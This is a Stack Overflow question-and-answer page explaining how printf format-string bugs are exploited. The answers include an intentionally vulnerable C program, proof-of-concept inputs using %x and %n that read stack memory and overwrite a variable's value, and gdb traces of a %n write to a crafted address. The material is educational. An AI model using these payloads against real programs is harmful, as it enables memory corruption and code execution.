69

I was reading about vulnerabilities in code and came across this Format-String Vulnerability.

Wikipedia says:

Format string bugs most commonly appear when a programmer wishes to print a string containing user supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended.

I got the problem with printf(buffer) version, but I still didn't get how this vulnerability can be used by attacker to execute harmful code. Can someone please tell me how this vulnerability can be exploited by an example?

7
  • 1
    For reference, the buffer overflow attack question is here: stackoverflow.com/questions/7344226/buffer-overflow-attack Commented Sep 18, 2011 at 5:31
  • possibly related: stackoverflow.com/questions/5672996/… Commented Sep 18, 2011 at 5:33
  • @Mehrdad: Why should printf pop anything off the stack? It's not like it knows (or cares) how many arguments (or even how big) were originally pushed... Commented Sep 18, 2011 at 5:33
  • 5
    @Mehrdad: It doesn't pop anything off the stack, though. It just reads them. Take note that the caller might have even pushed more arguments than the callee expects, and yet the caller does the cleanup. The callee doesn't know or care -- all it does is read the data. That's why you can't have callee-cleanup with varargs in C. Commented Sep 18, 2011 at 5:35
  • 1
    @Mehrdad Now you've got me thinking... seems you're right. It definitely reads more data from stack, but that doesn't necessarily imply popping as it reads. Commented Sep 18, 2011 at 5:37

6 Answers 6

98

You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):

int main(int argc, char **argv)
{
    char text[1024];
    static int some_value = -72;

    strcpy(text, argv[1]); /* ignore the buffer overflow here */

    printf("This is how you print correctly:\n");
    printf("%s", text);
    printf("This is how not to print:\n");
    printf(text);

    printf("some_value @ 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
    return(0);
}

The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:


Reading from arbitrary memory addresses

[EDIT] IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.

It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:

./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value @ 0x08049794 = -72 [0xffffffb8]

Writing to arbitrary memory addresses

You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:

./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value @ 0x08049794 = 31 [0x0000001f]

We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:

./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value @ 0x08049794 = 21 [0x00000015]

There are many possibilities and tricks to try (direct parameter access, large field width making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.


Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.

Sign up to request clarification or add additional context in comments.

2 Comments

hi, I'm wondering how $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n works? why is "??" printed out for the whole lot in front? How did it reach the memory address 0x09049794? Thanks a lot
The ?? is printed becuase $(printf "\x94\x97\x04\x08") will try to convert these values into characters. Because these values are not printable characters, your terminal will print a ? instead. (try printf "\x41\x42\x43\x44", wich will print ABCD because these are valid ascii values)
21

It is interesting that no-one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:

"%200$p"

to read the 200th item on the stack (if there is one). The intention is that you should list all the n$ numbers from 1 to the maximum, and it provides a way of resequencing how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).

However, some (probably most) systems are somewhat lackadaisical about how they validate the n$ values and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.


* The acronyms I18N, L10N, G11N and M18N are for internationalization, localization, globalization, and multinationalization respectively. The number represents the number of omitted letters.

1 Comment

Thanks for mentioning! I've been looking for an explanation.
9

Ah, the answer is in the article!

Uncontrolled format string is a type of software vulnerability, discovered around 1999, that can be used in security exploits. Previously thought harmless, format string exploits can be used to crash a program or to execute harmful code.

A typical exploit uses a combination of these techniques to force a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shellcode. The padding parameters to format specifiers are used to control the number of bytes output and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the %n format token can then overwrite with the address of the malicious code to execute.

This is because %n causes printf to write data to a variable, which is on the stack. But that means it could write to something arbitrarily. All you need is for someone to use that variable (it's relatively easy if it happens to be a function pointer, whose value you just figured out how to control) and they can make you execute anything arbitrarily.

Take a look at the links in the article; they look interesting.

Comments

2

A little theory

If you want to see actual trick to write at custom address jump to second part.

Lets try tweaking format string in printf() trick.

printf("ABABABAB");

But encoding a HEX address into a format string directly was not working. WHole point is masquerading some address which would be exploited for attack into stack, but my format string "ABABABAB" ended in .rodata section and nor in Stack as we wanted to.

Breakpoint 1, __printf (format=0x555555556004 "ABABABAB") at ./stdio-common/printf.c:28
(gdb) i args
format = 0x555555556004 "ABABABAB"

When this address is looked for in process memory map it is probably .rodata section:

      Start Addr           End Addr       Size     Offset  Perms  objfile
  0x555555554000     0x555555555000     0x1000        0x0  r--p   /home/drazen/proba/main
  0x555555555000     0x555555556000     0x1000     0x1000  r-xp   /home/drazen/proba/main
  0x555555556000     0x555555557000     0x1000     0x2000  r--p   /home/drazen/proba/main
  0x555555557000     0x555555558000     0x1000     0x2000  r--p   /home/drazen/proba/main
  0x555555558000     0x555555559000     0x1000     0x3000  rw-p   /home/drazen/proba/main

and check with readelf:

drazen@HP-ProBook-640G1:~/proba$ readelf  -p .rodata  main 
String dump of section '.rodata':
  [     4]  ABABABAB

So far OK, but weird part is when I dumped stack and expected to find ABABABAB string address in stack frame as argument passed to printf().

(gdb) i frame
Stack level 0, frame at 0x7fffffffddf0:
rip = 0x7ffff7de16f0 in __printf (./stdio-common/printf.c:28); saved rip = 0x555555555165
called by frame at 0x7fffffffde00
source language c.
Arglist at 0x7fffffffdde0, args: format=0x555555556004 "ABABABAB"

you can see return address to main() 0x555555555165, and expect to find format string address on stack at address 0x7fffffffdde0 But when we dump stack instead of format string address there is just 8 bytes of zeros where function argument should be, between __libc_start_call_main() stack frame return address and printf() stack frame return address:

(gdb) x/32gx $sp
0x7fffffffdde0: 0x0000000000000000  0x0000555555555165
0x7fffffffddf0: 0x0000000000000001  0x00007ffff7daad90
0x7fffffffde00: 0x0000000000000000  0x0000555555555149
0x7fffffffde10: 0x0000000100000000  0x00007fffffffdf08

So how is address of format string passed to prIntf()? When we dumped registers we saw format string address in rsi register.

(gdb) i r
rax            0x7ffff7f9b868      140737353726056
rbx            0x0                 0
rcx            0x0                 0
rdx            0x7fffffffdcf0      140737488346352
rsi            0x555555556004      93824992239624
rdi            0x7ffff7f9b780      140737353725824

Because function arguments (string address in this case) will be passed in rsi and rdi registers for purpose of speed and not in the stack we cant use format string and string arguments for this trick.

So we can just use strings created as local (automatic) variables to be put in stack, before return address in current stack frame.


Actual example

Anyway I tried this small example and it worked, printed out addresses put in local strings (created on stack). So we could use this trick to make local strings mimic addresses we want to access:

Sample code

We have to print 5 random values until we reached what we wanted, our local strings!

Using hexadecimal format %x showed HEX representation of strings avro, nana, loli on stack (using %s string format would cause segmentation fault because printf() would interpret those values as addresses of strings but those "addresses" are probably not in mapped area of the process or are in protected memory area):

Output

So now we used local variables on stack to "masquerade" as data access. But what if we can use this to try to write on that address?

Lets change last %X format specifier to %n. Instead of printing content of data on stack with %X, we will use this data as address of variable where printf() stores number of characters already printed. So idea is to gain write access to custom address.

printf("ABABABAB\n,%016llX\n,%016llX\n,%016llX\n,%016llX\n,%016llX\n,%016llX\n,%016llX\n,%n");

Our FAKE address 0x61616161616161 represented as ASCII "aaaaaaa" ends in %rax register, and printf will write at this address number of characters already printed (stored in r12):

(gdb) i r
rax            0x61616161616161    27410143614427489
rbx            0x555555556052      93824992239698


      0x00007ffff7df7c3c <+7180>:   jne    0x7ffff7df8276 <__vfprintf_internal+8774>
   => 0x00007ffff7df7c42 <+7186>:   mov    %r12d,(%rax)

But in our case this will use SEGV segmentation fault since address 0x61616161616161 is not mapped into process memory.

Continuing.
ABABABAB
,00007FFFFFFFDF08
,00007FFFFFFFDF18
,0000555555557DB8
,00007FFFF7F9BF10
,00007FFFF7FC9040
,0031313131313131
,0032323232323232
Program received signal SIGSEGV, Segmentation fault.

Comments

1

I would recommend reading this lecture note about format string vulnerability. It describes in details what happens and how, and has some images that might help you to understand the topic.

Comments

0

AFAIK it's mainly because it can crash your program, which is considered to be a denial-of-service attack. All you need is to give an invalid address (practically anything with a few %s's is guaranteed to work), and it becomes a simple denial-of-service (DoS) attack.

Now, it's theoretically possible for that to trigger anything in the case of an exception/signal/interrupt handler, but figuring out how to do that is beyond me -- you need to figure out how to write arbitrary data to memory as well.

But why does anyone care if the program crashes, you might ask? Doesn't that just inconvenience the user (who deserves it anyway)?

The problem is that some programs are accessed by multiple users, so crashing them has a non-negligible cost. Or sometimes they're critical to the running of the system (or maybe they're in the middle of doing something very critical), in which case this can be damaging to your data. Of course, if you crash Notepad then no one might care, but if you crash CSRSS (which I believe actually had a similar kind of bug -- a double-free bug, specifically) then yeah, the entire system is going down with you.


Update:

See this link for the CSRSS bug I was referring to.


Edit:

Take note that reading arbitrary data can be just as dangerous as executing arbitrary code! If you read a password, a cookie, etc. then it's just as serious as an arbitrary code execution -- and this is trivial if you just have enough time to try enough format strings.

8 Comments

Thanks Mehrdad, I think crashing a program would still be generally easier than being able to run your own code. So, specifically I'm looking for an answer to execution of attacker's code. But still I must upvote for a good answer :)
@Atul: Haha thanks. :) Yeah, if anyone can come up with an actual arbitrary code execution example then I'd DEFINITELY want to see it!
@Atul: I posted another answer, from the article itself. If I manage to write the code then I'll do that, too -- but that one is a direct attack of the kind you're looking for.
This answer is nonsense. You should delete it in light of your correct answer.
The OP wanted to know how printf can be exploited to execute harmful code. You wrote about a DoS attack. That may be an exploit, but it doesn't explain how to execute harmful code. The CSRSS doesn't use printf, so it doesn't answer the OP's question either.
|

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.